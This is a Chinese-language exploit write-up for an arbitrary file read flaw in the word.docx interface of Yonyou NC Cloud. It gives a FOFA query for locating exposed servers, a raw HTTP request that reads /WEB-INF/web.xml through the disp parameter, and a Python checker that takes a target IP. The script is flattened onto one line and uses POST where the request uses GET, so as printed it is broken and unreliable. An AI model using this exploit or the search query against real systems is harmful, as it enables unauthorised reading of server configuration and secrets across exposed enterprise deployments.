聲明
本文僅用于技術(shù)交流，請(qǐng)勿用于非法用途
由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，文章作者不為此承擔(dān)任何責(zé)任。

一、產(chǎn)品介紹

用友 NC Cloud，大型企業(yè)數(shù)字化平臺(tái)， 聚焦數(shù)字化管理、數(shù)字化經(jīng)營(yíng)、數(shù)字化商業(yè)，幫助大型企業(yè)實(shí)現(xiàn) 人、財(cái)、物、客的全面數(shù)字化，從而驅(qū)動(dòng)業(yè)務(wù)創(chuàng)新與管理變革，與企業(yè)管理者一起重新定義未來(lái)的高度。為客戶提供面向大型企業(yè)集團(tuán)、制造業(yè)、消費(fèi)品、建筑、房地產(chǎn)、金融保險(xiǎn)等14個(gè)行業(yè)大類(lèi)，68個(gè)細(xì)分行業(yè)，涵蓋數(shù)字營(yíng)銷(xiāo)、智能制造、財(cái)務(wù)共享、數(shù)字采購(gòu)等18大解決方案，幫助企業(yè)全面落地?cái)?shù)字化。

二、漏洞描述

用友NC Cloud word.docx接口存在任意文件讀取漏洞

三、fofa語(yǔ)法

body="UClient.dmg"

四、漏洞復(fù)現(xiàn)

poc

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

五、poc.py

import requestsdef verify(ip):url = f'{ip}/portal/docctr/open/word.docx?disp=/WEB-INF/web.xml'headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)','Accept': ' * / *','Connection': 'Keep - Alive'}try:response = requests.post(url, headers=headers)print(response)# 驗(yàn)證成功輸出相關(guān)信息if response.status_code == 200:print(f"{ip}存在用友NC word.docx接口任意文件讀取漏洞！！！")else:print('漏洞不存在')except Exception as e:passif __name__ == '__main__':self = input('請(qǐng)輸入目標(biāo)主機(jī)IP地址：')verify(self)